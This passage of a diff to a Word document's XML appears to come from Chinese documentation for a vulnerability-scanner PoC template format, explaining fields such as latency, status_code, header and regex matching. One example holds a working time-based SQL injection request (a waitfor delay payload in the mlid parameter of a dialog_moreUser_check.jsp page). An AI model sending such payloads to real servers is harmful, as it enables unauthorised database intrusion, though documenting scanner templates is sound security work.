-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>延时注入的字段，以下</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>poc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>示例，使服务器延时</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>测试sql延时注入的字段，以下poc示例，使服务器延时</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2858,16 +3237,13 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>GET /u8qx/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dialog_moreUser_check.jsp?mlid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>=';waitfor+delay+'0:0:</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>GET /u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2880,58 +3256,64 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Host:</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>AppleWebKit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Encoding: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>gzip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, deflate</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Language: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zh-CN,zh;q</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>=0.9</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Encoding: gzip, deflate</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2954,30 +3336,42 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "latency": 5,</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -2986,6 +3380,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3006,7 +3405,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3027,101 +3426,96 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="5"/>
         <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>.1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.3 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>status_code</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>status_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>状态码</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>状态码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
         <w:t>）</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>顾名思义，判断网站状态码，在测试</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>poc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>时对方网站是什么状态码就写什么</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>顾名思义，判断网站状态码，在测试poc时对方网站是什么状态码就写什么</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -3139,6 +3533,11 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3147,6 +3546,11 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3154,18 +3558,15 @@
               <w:t xml:space="preserve">    </w:t>
             </w:r>
             <w:r>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>"status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3176,12 +3577,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="5"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -3222,6 +3629,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>H</w:t>
       </w:r>
@@ -3233,6 +3645,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3253,7 +3670,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3275,6 +3692,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3295,7 +3717,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3317,6 +3739,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3337,7 +3764,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3359,6 +3786,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3368,6 +3800,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3391,6 +3828,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3411,6 +3853,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3448,16 +3895,31 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "header": "text/html"</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -3466,6 +3928,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3480,6 +3947,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3514,6 +3986,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3534,7 +4011,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3570,11 +4047,21 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "header": "</w:t>
             </w:r>
@@ -3619,19 +4106,21 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -3640,6 +4129,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3660,6 +4154,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3668,6 +4167,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3688,7 +4192,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3724,11 +4228,21 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "header": "</w:t>
             </w:r>
@@ -3750,19 +4264,21 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -3770,12 +4286,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -3797,6 +4319,11 @@
       <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3807,23 +4334,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>，这里提供两个函数regex和</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
+        <w:t>，这里提供两个函数regex和json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -3845,6 +4370,11 @@
       <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3853,6 +4383,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3877,6 +4412,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3898,7 +4438,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3920,6 +4460,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3941,6 +4486,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3961,7 +4511,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3986,7 +4536,7 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -4018,7 +4568,7 @@
       <w:pPr>
         <w:pStyle w:val="4"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -4038,29 +4588,31 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中使用正则表达式时会产生格式冲突，突然某一天，我脑子里出现了一种奇妙的想法，将正则表达式使用base64格式编码一下不就可以了？</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在json中使用正则表达式时会产生格式冲突，突然某一天，我脑子里出现了一种奇妙的想法，将正则表达式使用base64格式编码一下不就可以了？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -4081,7 +4633,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4102,7 +4654,13 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
